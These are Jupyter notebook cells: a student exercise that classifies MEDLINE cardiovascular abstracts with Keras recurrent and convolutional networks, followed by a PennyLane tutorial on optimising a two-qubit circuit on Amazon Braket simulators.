cm = confusion_matrix(labels, y_pred)
print(np.array2string(cm, max_line_width = 100))
###Output
[[241 10 1 13 7 15 4 18 2 3 8 4 13 15 1 5 8 0 0 16 9 2 28]
[ 11 61 0 15 0 6 2 6 4 3 3 2 5 5 1 1 2 0 1 24 0 0 6]
[ 3 1 35 2 0 2 0 3 0 2 2 1 0 2 0 1 0 2 0 3 0 1 5]
[ 10 4 1 886 8 15 20 41 17 7 11 23 14 6 3 5 12 2 21 7 3 0 47]
[ 12 0 0 12 165 3 1 3 0 4 2 2 2 4 2 7 7 5 2 7 17 0 26]
[ 26 5 3 77 4 286 0 9 0 3 1 7 6 26 2 4 8 8 8 6 6 7 86]
[ 2 1 0 10 3 1 72 1 2 0 0 1 0 2 0 0 1 2 0 0 0 0 2]
[ 23 6 3 43 3 6 2 249 12 1 1 1 2 31 1 8 2 4 2 20 18 4 31]
[ 0 0 0 13 2 0 0 7 80 3 2 1 1 1 0 0 1 1 0 2 1 0 10]
[ 11 3 2 45 24 7 4 4 2 239 16 4 8 51 0 7 6 6 8 13 32 4 125]
[ 1 1 2 7 4 1 1 0 0 0 108 2 0 3 0 3 4 3 0 6 2 0 14]
[ 15 0 0 94 1 8 0 11 1 5 0 228 9 33 2 6 4 9 12 4 2 2 45]
[ 9 5 1 37 0 5 0 6 0 1 0 4 167 4 1 2 6 1 2 11 0 0 19]
[ 18 1 1 26 4 4 2 12 0 14 7 15 18 954 3 22 13 19 8 3 14 3 88]
[ 10 2 1 27 7 4 2 13 1 1 3 15 9 13 64 2 7 3 2 11 3 1 14]
[ 3 0 0 12 4 1 1 3 2 3 0 1 9 19 0 125 1 1 1 3 1 0 10]
[ 4 2 0 28 20 1 7 3 4 4 6 5 3 4 0 4 162 0 3 14 2 2 17]
[ 3 1 0 18 5 7 2 2 0 2 4 11 2 38 0 1 2 224 23 2 5 1 35]
[ 0 0 0 19 6 1 0 1 0 2 3 1 0 20 0 1 2 20 101 4 1 0 9]
[ 20 17 2 54 6 12 4 30 6 8 5 11 8 11 2 1 12 3 5 280 11 1 16]
[ 17 0 1 19 22 18 2 5 2 3 8 6 2 25 2 0 12 5 1 12 328 7 49]
[ 6 1 0 2 3 5 0 2 0 1 0 0 0 21 0 0 4 3 1 1 2 37 3]
[ 53 12 6 193 49 90 13 62 24 20 23 37 33 284 11 39 32 14 15 33 48 8 700]]
###Markdown
Reading the confusion matrix: we have 23 classes, so the matrix is 23x23. For example, for class/label 0 (texts belonging to folder C01), out of 498 predictions only 241 are correct; this ratio is the precision, which can be seen in the table below. The other ratio is recall, 57% for class 0: 423 texts belong to class 0, but the model only picks up 241 of them. Combining both ratios gives the F1-score used to measure the model. The average score is 55%.
###Code
# Classification results per class
print(classification_report(labels, y_pred))
###Output
precision recall f1-score support
0 0.48 0.57 0.52 423
1 0.46 0.39 0.42 158
2 0.59 0.54 0.56 65
3 0.54 0.76 0.63 1163
4 0.48 0.58 0.52 283
5 0.57 0.49 0.53 588
6 0.52 0.72 0.60 100
7 0.51 0.53 0.52 473
8 0.50 0.64 0.56 125
9 0.73 0.38 0.50 621
10 0.51 0.67 0.58 162
11 0.60 0.46 0.52 491
12 0.54 0.59 0.56 281
13 0.61 0.76 0.68 1249
14 0.67 0.30 0.41 215
15 0.51 0.62 0.56 200
16 0.53 0.55 0.54 295
17 0.67 0.58 0.62 388
18 0.47 0.53 0.50 191
19 0.58 0.53 0.56 525
20 0.65 0.60 0.62 546
21 0.46 0.40 0.43 92
22 0.51 0.39 0.44 1799
avg / total 0.56 0.56 0.55 10433
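###Markdown
As a cross-check of the reading above, the class-0 precision and recall can be recomputed directly from the confusion matrix cm computed earlier (rows are true classes, columns are predicted classes):
###Code
tp_0 = cm[0, 0]                       # correct class-0 predictions
precision_0 = tp_0 / cm[:, 0].sum()   # divided by everything predicted as class 0 (column sum)
recall_0 = tp_0 / cm[0, :].sum()      # divided by everything that truly is class 0 (row sum)
f1_0 = 2 * precision_0 * recall_0 / (precision_0 + recall_0)
print('Class 0: precision = {:.2f}, recall = {:.2f}, f1 = {:.2f}'.format(precision_0, recall_0, f1_0))
###Output
_____no_output_____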
###Markdown
Try to improve performance by adding more tools and changing the capacity of the network to get a better result.
###Code
# Require Libraries
from keras.layers import LSTM, Dropout, Conv1D, MaxPooling1D, GlobalMaxPooling1D, GRU
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(Conv1D(32, 9, activation='relu'))
model.add(MaxPooling1D(5))
model.add(Conv1D(32, 9, activation='relu'))
model.add(GRU(32, dropout=0.1, recurrent_dropout=0.5))
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_2 (Embedding) (None, 500, 32) 640000
_________________________________________________________________
conv1d_1 (Conv1D) (None, 492, 32) 9248
_________________________________________________________________
max_pooling1d_1 (MaxPooling1 (None, 98, 32) 0
_________________________________________________________________
conv1d_2 (Conv1D) (None, 90, 32) 9248
_________________________________________________________________
gru_1 (GRU) (None, 32) 6240
_________________________________________________________________
dense_4 (Dense) (None, 1024) 33792
_________________________________________________________________
dense_5 (Dense) (None, 23) 23575
=================================================================
Total params: 722,103
Trainable params: 722,103
Non-trainable params: 0
_________________________________________________________________
###Markdown
I add convolutional layers after the word embedding, increase the embedding dimension, and use a rule of thumb: if N is the output size, the numbers of neurons in the hidden layers follow the ratio 3xN, 2xN, 1.5xN, N. A GRU is used in place of Flatten, LSTM or GlobalMaxPooling. The result: the parameter count is reduced from about 4.5 million to around seven hundred thousand, but the validation accuracy is poor.
###Code
import time
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 12,
batch_size = 32,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/12
8346/8346 [==============================] - 62s 7ms/step - loss: 2.8802 - acc: 0.1517 - val_loss: 2.8993 - val_acc: 0.1260
Epoch 2/12
8346/8346 [==============================] - 61s 7ms/step - loss: 2.8328 - acc: 0.1511 - val_loss: 2.9058 - val_acc: 0.1188
Epoch 3/12
8346/8346 [==============================] - 66s 8ms/step - loss: 2.7751 - acc: 0.1745 - val_loss: 2.8755 - val_acc: 0.1893
Epoch 4/12
8346/8346 [==============================] - 62s 7ms/step - loss: 2.7961 - acc: 0.1742 - val_loss: 2.9464 - val_acc: 0.1514
Epoch 5/12
8346/8346 [==============================] - 60s 7ms/step - loss: 2.8355 - acc: 0.1842 - val_loss: 2.9466 - val_acc: 0.1998
Epoch 6/12
8346/8346 [==============================] - 64s 8ms/step - loss: 2.8873 - acc: 0.1964 - val_loss: 3.5905 - val_acc: 0.1893
Epoch 7/12
8346/8346 [==============================] - 62s 7ms/step - loss: 2.9915 - acc: 0.1825 - val_loss: 3.5039 - val_acc: 0.1030
Epoch 8/12
8346/8346 [==============================] - 56s 7ms/step - loss: 3.1240 - acc: 0.1783 - val_loss: 3.4315 - val_acc: 0.1926
Epoch 9/12
8346/8346 [==============================] - 58s 7ms/step - loss: 3.2366 - acc: 0.1746 - val_loss: 3.8641 - val_acc: 0.1327
Epoch 10/12
8346/8346 [==============================] - 60s 7ms/step - loss: 3.3589 - acc: 0.1782 - val_loss: 3.9219 - val_acc: 0.1581
Epoch 11/12
8346/8346 [==============================] - 58s 7ms/step - loss: 3.5194 - acc: 0.1816 - val_loss: 5.9114 - val_acc: 0.0379
Epoch 12/12
8346/8346 [==============================] - 55s 7ms/step - loss: 3.5893 - acc: 0.1879 - val_loss: 4.4951 - val_acc: 0.1169
Elapsed time: 728.18 seconds
###Markdown
Compared to the first model, it does better in the later epochs, so I thought that if I introduced tools for resisting overfitting, it could do better still.
###Code
from keras import regularizers
model = Sequential()
model.add(Embedding(max_words, 46, input_length=maxlen))
model.add(Flatten())
model.add(Dense(690,kernel_regularizer=regularizers.l2(0.009), activation = 'relu'))
model.add(Dropout(0.2))
model.add(Dense(460,kernel_regularizer=regularizers.l2(0.009), activation = 'relu'))
model.add(Dropout(0.4))
model.add(Dense(230,kernel_regularizer=regularizers.l2(0.009), activation = 'relu'))
model.add(Dropout(0.5))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_31 (Embedding) (None, 500, 46) 920000
_________________________________________________________________
flatten_20 (Flatten) (None, 23000) 0
_________________________________________________________________
dense_97 (Dense) (None, 690) 15870690
_________________________________________________________________
dropout_65 (Dropout) (None, 690) 0
_________________________________________________________________
dense_98 (Dense) (None, 460) 317860
_________________________________________________________________
dropout_66 (Dropout) (None, 460) 0
_________________________________________________________________
dense_99 (Dense) (None, 230) 106030
_________________________________________________________________
dropout_67 (Dropout) (None, 230) 0
_________________________________________________________________
dense_100 (Dense) (None, 23) 5313
=================================================================
Total params: 17,219,893
Trainable params: 17,219,893
Non-trainable params: 0
_________________________________________________________________
###Markdown
The capacity of the model has been increased, and I also added two ways to reduce overfitting: dropout and L2 regularization. The result: the losses increase but the accuracies stay nearly the same even after 30 epochs, although the model does resist overfitting.
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 30,
batch_size = 128,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(Conv1D(32, 9, activation='relu'))
model.add(MaxPooling1D(5))
model.add(Conv1D(32, 9, activation='relu'))
model.add(GRU(32, dropout=0.1, recurrent_dropout=0.5))
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(loss='binary_crossentropy',
optimizer='adamax',
metrics= ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_34 (Embedding) (None, 500, 32) 640000
_________________________________________________________________
conv1d_28 (Conv1D) (None, 492, 32) 9248
_________________________________________________________________
max_pooling1d_19 (MaxPooling (None, 98, 32) 0
_________________________________________________________________
conv1d_29 (Conv1D) (None, 90, 32) 9248
_________________________________________________________________
gru_5 (GRU) (None, 32) 6240
_________________________________________________________________
dense_105 (Dense) (None, 1024) 33792
_________________________________________________________________
dense_106 (Dense) (None, 23) 23575
=================================================================
Total params: 722,103
Trainable params: 722,103
Non-trainable params: 0
_________________________________________________________________
###Markdown
This gives the best-looking performance in training and validation, but it is essentially a nonsense model, created after many attempts to improve the results: likely because with loss='binary_crossentropy' on a 23-class softmax output, Keras reports binary accuracy, which inflates the numbers.
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 10,
batch_size = 128,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
from keras.metrics import categorical_accuracy
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(Conv1D(32, 9, activation='relu'))
model.add(MaxPooling1D(5))
model.add(Conv1D(32, 9, activation='relu'))
model.add(GRU(32, dropout=0.1, recurrent_dropout=0.5))
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = [categorical_accuracy])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_36 (Embedding) (None, 500, 32) 640000
_________________________________________________________________
conv1d_32 (Conv1D) (None, 492, 32) 9248
_________________________________________________________________
max_pooling1d_21 (MaxPooling (None, 98, 32) 0
_________________________________________________________________
conv1d_33 (Conv1D) (None, 90, 32) 9248
_________________________________________________________________
gru_7 (GRU) (None, 32) 6240
_________________________________________________________________
dense_109 (Dense) (None, 1024) 33792
_________________________________________________________________
dense_110 (Dense) (None, 23) 23575
=================================================================
Total params: 722,103
Trainable params: 722,103
Non-trainable params: 0
_________________________________________________________________
###Markdown
Last try, and it still fails.
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 10,
batch_size = 128,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/10
8346/8346 [==============================] - 30s 4ms/step - loss: 2.8232 - categorical_accuracy: 0.1674 - val_loss: 2.7949 - val_categorical_accuracy: 0.1730
Epoch 2/10
8346/8346 [==============================] - 25s 3ms/step - loss: 2.7035 - categorical_accuracy: 0.1751 - val_loss: 2.6963 - val_categorical_accuracy: 0.2065
Epoch 3/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.5764 - categorical_accuracy: 0.2025 - val_loss: 2.8164 - val_categorical_accuracy: 0.2113
Epoch 4/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.5005 - categorical_accuracy: 0.2213 - val_loss: 2.7194 - val_categorical_accuracy: 0.2084
Epoch 5/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.4247 - categorical_accuracy: 0.2505 - val_loss: 2.7581 - val_categorical_accuracy: 0.2276
Epoch 6/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.3287 - categorical_accuracy: 0.2810 - val_loss: 2.7948 - val_categorical_accuracy: 0.2123
Epoch 7/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.2461 - categorical_accuracy: 0.2994 - val_loss: 2.8336 - val_categorical_accuracy: 0.2262
Epoch 8/10
8346/8346 [==============================] - 27s 3ms/step - loss: 2.1643 - categorical_accuracy: 0.3229 - val_loss: 3.0127 - val_categorical_accuracy: 0.2137
Epoch 9/10
8346/8346 [==============================] - 27s 3ms/step - loss: 2.0885 - categorical_accuracy: 0.3379 - val_loss: 2.9886 - val_categorical_accuracy: 0.1931
Epoch 10/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.0305 - categorical_accuracy: 0.3569 - val_loss: 3.0541 - val_categorical_accuracy: 0.1888
Elapsed time: 266.94 seconds
###Markdown
Case 3. Medical text categorization. Joona Klemetti, 10.3.2018. Cognitive Systems for Health Technology Applications. Helsinki Metropolia University of Applied Sciences. 1. Objectives The aim of this case is to use recurrent and convolutional neural networks to create a classifier for a collection of medical abstracts extracted from MEDLINE, the online medical information database. 2. Required libraries First it is necessary to import all libraries. This assignment uses the os module for downloading and listing data and labels, the time library to measure elapsed time, numpy for scientific computing and multidimensional arrays, Keras for preprocessing the data, defining the labels, and building and training the model, matplotlib for plotting the training history, and sklearn for calculating metrics.
###Code
import os
import time
import numpy as np
import matplotlib.pyplot as plt
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils.np_utils import to_categorical
from keras.models import Sequential
from keras.layers import Dense, Embedding, LSTM
from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix
from sklearn.metrics import classification_report, recall_score
###Output
Using TensorFlow backend.
###Markdown
3. Data description and preprocessing The data used in this case is the cardiovascular diseases abstract collection from MEDLINE. The data is already split into training and test sets, and the abstracts are in sub-folders according to their categories. The data is downloaded from http://disi.unitn.it/moschitti/corpora.htm; visit that page for more information about the abstracts. For more information about the labels, please visit http://disi.unitn.it/moschitti/corpora/First-Level-Categories-of-Cardiovascular-Disease.txt First, the medical abstracts and labels are downloaded. After that, the abstracts are collected into a list of strings, and the labels are collected into the labels list. Next, the data is tokenized, and the maximum text length and number of words are defined. The data is also shaped into the right form and shuffled. Shuffling is important because otherwise there will be problems when splitting the data into training and validation sets: without shuffling, the validation set would consist only of abstracts from the last two categories.
###Code
ohsumed_dir = 'ohsumed-first-20000-docs'
train_dir = os.path.join(ohsumed_dir, 'training')
labels = []
texts = []
t1 = time.time()
# Generate a list L = ['C01', 'C02, ..., 'C023']
L = ['C{:02}'.format(n) for n in range(1, 23 + 1)]
for label_type in L:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
texts.append(f.read())
f.close()
i = L.index(label_type)
labels.append(i)
t2 = time.time()
print('Time elapsed {:.0f} seconds.'.format((t2-t1)))
maxlen = 250
max_words = 20000
tokenizer = Tokenizer(num_words = max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
print('Found %s unique tokens' % len(word_index))
data = pad_sequences(sequences, maxlen = maxlen)
labels = np.asarray(labels)
one_hot_labels = to_categorical(labels)
print('Shape of data tensor:', data.shape)
print('Shape of labels tensor:', one_hot_labels.shape)
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
one_hot_labels = one_hot_labels[indices]
###Output
_____no_output_____
###Markdown
4. Building the model The recurrent neural network is built using the Keras Sequential model. The first layer, an Embedding layer, turns positive integers into dense vectors. After the Embedding layer there are two LSTM recurrent layers with dropout and recurrent_dropout arguments to avoid overfitting. LSTM is an abbreviation for long short-term memory, an architecture introduced in 1997. Finally, there is a Dense layer with softmax activation to classify the data into the 23 categories.
###Code
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(LSTM(100, return_sequences = True, dropout = 0.4, recurrent_dropout = 0.2))
model.add(LSTM(100, dropout = 0.2, recurrent_dropout = 0.4))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_1 (Embedding) (None, 250, 32) 640000
_________________________________________________________________
lstm_1 (LSTM) (None, 250, 100) 53200
_________________________________________________________________
lstm_2 (LSTM) (None, 100) 80400
_________________________________________________________________
dense_1 (Dense) (None, 23) 2323
=================================================================
Total params: 775,923
Trainable params: 775,923
Non-trainable params: 0
_________________________________________________________________
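###Markdown
As a side note on the Embedding layer described above, here is a minimal illustrative check of its output shape (independent of the model being trained; the vocabulary size and indices below are made up):
###Code
from keras.models import Sequential
from keras.layers import Embedding
import numpy as np

demo = Sequential()
demo.add(Embedding(input_dim=1000, output_dim=8, input_length=4))   # 1000-word vocabulary, 8-dim vectors
fake_batch = np.array([[4, 20, 7, 0],
                       [1, 2, 3, 4]])                               # integer word indices
print(demo.predict(fake_batch).shape)                               # (2, 4, 8): each index becomes an 8-dim vector
###Output
_____no_output_____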
###Markdown
5. Training and Validation After the model is built, it is time to train and validate the network. Training is executed with the .fit() method; the validation split is defined by the validation_split argument.
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 20,
batch_size = 34,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/20
8346/8346 [==============================] - 194s 23ms/step - loss: 2.8224 - acc: 0.1691 - val_loss: 2.7976 - val_acc: 0.1624
Epoch 2/20
8346/8346 [==============================] - 186s 22ms/step - loss: 2.7106 - acc: 0.1913 - val_loss: 2.6602 - val_acc: 0.2142
Epoch 3/20
8346/8346 [==============================] - 193s 23ms/step - loss: 2.6165 - acc: 0.2153 - val_loss: 2.6487 - val_acc: 0.2113
Epoch 4/20
8346/8346 [==============================] - 187s 22ms/step - loss: 2.5576 - acc: 0.2360 - val_loss: 2.6529 - val_acc: 0.2209
Epoch 5/20
8346/8346 [==============================] - 192s 23ms/step - loss: 2.5092 - acc: 0.2574 - val_loss: 2.6790 - val_acc: 0.2520
Epoch 6/20
8346/8346 [==============================] - 189s 23ms/step - loss: 2.4818 - acc: 0.2644 - val_loss: 2.6024 - val_acc: 0.2401
Epoch 7/20
8346/8346 [==============================] - 194s 23ms/step - loss: 2.3878 - acc: 0.2872 - val_loss: 2.5972 - val_acc: 0.2444
Epoch 8/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.3268 - acc: 0.2970 - val_loss: 2.6065 - val_acc: 0.2420
Epoch 9/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.2854 - acc: 0.3132 - val_loss: 2.6033 - val_acc: 0.2487
Epoch 10/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.2471 - acc: 0.3160 - val_loss: 2.6121 - val_acc: 0.2463
Epoch 11/20
8346/8346 [==============================] - 196s 23ms/step - loss: 2.2111 - acc: 0.3245 - val_loss: 2.6331 - val_acc: 0.2472
Epoch 12/20
8346/8346 [==============================] - 200s 24ms/step - loss: 2.1891 - acc: 0.3308 - val_loss: 2.6434 - val_acc: 0.2540
Epoch 13/20
8346/8346 [==============================] - 207s 25ms/step - loss: 2.1616 - acc: 0.3353 - val_loss: 2.6625 - val_acc: 0.2568
Epoch 14/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.1322 - acc: 0.3464 - val_loss: 2.6689 - val_acc: 0.2468
Epoch 15/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.1094 - acc: 0.3478 - val_loss: 2.6731 - val_acc: 0.2549
Epoch 16/20
8346/8346 [==============================] - 184s 22ms/step - loss: 2.0733 - acc: 0.3641 - val_loss: 2.7383 - val_acc: 0.2405
Epoch 17/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.0614 - acc: 0.3603 - val_loss: 2.7417 - val_acc: 0.2329
Epoch 18/20
8346/8346 [==============================] - 182s 22ms/step - loss: 2.0326 - acc: 0.3731 - val_loss: 2.7400 - val_acc: 0.2329
Epoch 19/20
8346/8346 [==============================] - 200s 24ms/step - loss: 2.0061 - acc: 0.3843 - val_loss: 2.7695 - val_acc: 0.2367
Epoch 20/20
8346/8346 [==============================] - 182s 22ms/step - loss: 1.9740 - acc: 0.3874 - val_loss: 2.7523 - val_acc: 0.2386
Elapsed time: 3787.94 seconds
###Markdown
6. Evaluation The model is tested with the test set. The evaluate function computes the test set's loss and accuracy.
###Code
# Download and preproces test data
test_dir = os.path.join(ohsumed_dir, 'test')
test_labels = []
test_texts = []
for label_type in L:
dir_name = os.path.join(test_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
test_texts.append(f.read())
f.close()
i = L.index(label_type)
test_labels.append(i)
test_sequences = tokenizer.texts_to_sequences(test_texts)
x_test = pad_sequences(test_sequences, maxlen=maxlen)
test_labels = np.asarray(test_labels)
y_test = to_categorical(test_labels)
#Evaluate model with test data
model.evaluate(x_test, y_test)
###Output
12733/12733 [==============================] - 66s 5ms/step
###Markdown
7. Results and Discussion Overfitting is noticeable in the model, and despite the dropout arguments it still bothers the network. The overfitting can be seen from the lower test accuracy and higher loss. It is interesting that the test accuracy and loss are much better than the validation results. As you can see from the graphs, the overfitting started after about the 6th epoch.
###Code
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.figure(figsize=(15, 3))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.figure(figsize=(15, 3))
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
8. Metrics results Metrics are calculated with the sklearn library. There is a classification report, a confusion matrix, and the possibility to check the prediction for an individual text.
###Code
# Calculate the predictions
predictions = model.predict(data)
y_pred = np.argmax(predictions, axis = 1)
# Classification results per class
print(classification_report(labels, y_pred))
# Confusion matrix
cm = confusion_matrix(labels, y_pred)
print(np.array2string(cm, max_line_width = 120))
predict_text=503
print(texts[indices[predict_text]])
print('True class: ', labels[predict_text])
print('Predicted class:', y_pred[predict_text])
print('Predictions per class:')
print(np.array2string(predictions[predict_text], precision = 2))
plt.stem(predictions[predict_text])
plt.show()
###Output
True class: 22
Predicted class: 22
Predictions per class:
[ 0.01 0. 0. 0.03 0.01 0.06 0. 0.01 0. 0.19 0. 0.03
0.01 0.14 0.01 0.03 0.01 0.01 0. 0. 0.02 0. 0.44]
|
examples/pennylane/0_Getting_started.ipynb | ###Markdown
Combining PennyLane with Amazon Braket What is PennyLane? PennyLane is a Python library for differentiable programming of quantum computers, allowing you to train a quantum computer the same way as a neural network. PennyLane integrates with Amazon Braket to add additional features for quantum machine learning and optimization. This introductory tutorial walks you through how to train a quantum circuit using Amazon Braket simulators and PennyLane's automatic differentiation capabilities. Setup PennyLane is already installed on Braket notebook instances. On a local machine, PennyLane can be installed by following [these](https://pennylane.ai/install.html) instructions. It can then be imported with:
###Code
import pennylane as qml
from pennylane import numpy as np
###Output
_____no_output_____
###Markdown
To use Braket as a backend in PennyLane, we have to create a PennyLane device. Here we will first create a device that uses the local Braket simulator that runs on your local laptop (or on the server that hosts this notebook).
###Code
wires = 2 # Number of qubits
dev = qml.device("braket.local.qubit", wires=wires)
###Output
_____no_output_____
###Markdown
Below we will also show you how to scale out simulations to the AWS cloud. Defining a circuit We will choose a simple two-qubit circuit with two controllable rotations and a CNOT gate.
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
###Output
_____no_output_____
###Markdown
The ``qml.qnode(dev)`` decorator binds the circuit to the local Braket device. Now, every time that ``circuit()`` is called, the quantum computation defined in the function above will be executed with Braket. Note PennyLane also supports automatic differentiation with PyTorch and TensorFlow interfaces. The choice of interface can be specified using:@qml.qnode(dev, interface="<interface>"). Evaluating the circuit and accessing its gradient Let's set some values for our controllable parameters:
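For example, the following short sketch (an illustration added here, not part of the original notebook; it assumes the `torch` package is installed and reuses the `dev` defined above) binds the same circuit to the PyTorch interface:

```python
# Hypothetical variant of the circuit above using the PyTorch interface.
# Parameters passed to it should then be torch tensors.
@qml.qnode(dev, interface="torch")
def torch_circuit(params):
    qml.RX(params[0], wires=0)
    qml.RY(params[1], wires=1)
    qml.CNOT(wires=[0, 1])
    return qml.expval(qml.PauliZ(1))
```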
###Code
params = np.array([0.1, 0.2])
###Output
_____no_output_____
###Markdown
The circuit can be evaluated with these parameters using
###Code
print("Expectation value of circuit:", circuit(params))
print("Drawing of circuit:\n")
print(circuit.draw())
###Output
Drawing of circuit:
0: ──RX(0.1)──╭C──┤
1: ──RY(0.2)──╰X──┤ ⟨Z⟩
###Markdown
A crucial element of machine learning and optimization is accessing the gradient of a model with respect to its parameters. This functionality is built into PennyLane:
###Code
dcircuit = qml.grad(circuit)
###Output
_____no_output_____
###Markdown
Here, ``dcircuit`` is a callable function that evaluates the gradient of the circuit, i.e., its partial derivatives with respect to the controllable parameters.
###Code
dcircuit(params)
###Output
_____no_output_____
###Markdown
Training the circuit Suppose we now want to minimize the output of the circuit by updating its parameters. This can be done using gradient-based optimization.First, an optimizer is fixed:
###Code
opt = qml.GradientDescentOptimizer(stepsize=0.2)
###Output
_____no_output_____
###Markdown
The next step is to run the optimizer for a chosen number of iterations:
###Code
iterations = 50
costs = []
for i in range(iterations):
params, cost = opt.step_and_cost(circuit, params)
costs.append(cost)
# Visualize results
import matplotlib.pyplot as plt
costs.append(circuit(params))
plt.plot(costs)
plt.xlabel("Iterations")
plt.ylabel("Cost")
print("Minimized circuit output:", circuit(params))
print("Optimized parameters:", params)
###Output
Minimized circuit output: -0.9999996577749632
Optimized parameters: [4.19618503e-04 3.14087965e+00]
###Markdown
Note The circuit considered here is very simple and can be optimized easily by hand. However, the need for PennyLane's automatic differentiation capabilities becomes apparent as we make the problem more complicated, e.g., with more gates and different types of output measurement. In later demos, we will also see how Braket can be used to parallelize evaluation of the gradient, providing a turbocharger for quantum circuit training in PennyLane. Running circuits on Braket's managed simulator, SV1 So far we have used the local Braket simulator. This is a great choice for quick prototyping, but it is not suitable for large circuits with many qubits and does not provide a connection to quantum hardware.Amazon Braket also provides access to fully managed, high-performance simulators and quantum processing units (QPUs) from different [providers](https://aws.amazon.com/braket/hardware-providers/). These devices can be accessed through PennyLane by changing a single line of code, unlocking the potential for machine learning and optimization on quantum hardware and high performance simulators!Each remote Braket device can be selected through its [ARN](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html). The supported devices on Braket are listed [here](https://docs.aws.amazon.com/braket/latest/developerguide/braket-devices.html). For now, we will pick the managed SV1 simulator. Caution: Running hybrid algorithms on a QPU can take a long time and incur high usage fees charged to your AWS account.
###Code
device_arn = "arn:aws:braket:::device/quantum-simulator/amazon/sv1"
###Output
_____no_output_____
###Markdown
We also need to choose an S3 folder to store the device-execution results:
###Code
# Please enter the S3 bucket you created during onboarding
# (or any other S3 bucket starting with 'amazon-braket-' in your account) in the code below
my_bucket = f"amazon-braket-Your-Bucket-Name" # the name of the bucket
my_prefix = "Your-Folder-Name" # the name of the folder in the bucket
s3_folder = (my_bucket, my_prefix)
###Output
_____no_output_____
###Markdown
In PennyLane, all remote Braket devices are then accessed through a single PennyLane device named ``braket.aws.qubit``.
###Code
dev = qml.device('braket.aws.qubit', device_arn=device_arn, wires=2, s3_destination_folder=s3_folder)
###Output
_____no_output_____
###Markdown
A follow up [tutorial](./1_Parallelized_optimization_of_quantum_circuits.ipynb) shows you how to use the remote device to run multiple circuits in parallel, while the [QAOA tutorial](./2_Graph_optimization_with_QAOA.ipynb) takes a deeper dive into graph optimization, including using SV1 to optimize a 20-node graph. Let's execute our circuit on SV1, as well as calculating the gradient:
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
dcircuit = qml.grad(circuit)
print("Result of circuit run on SV1:", circuit(params))
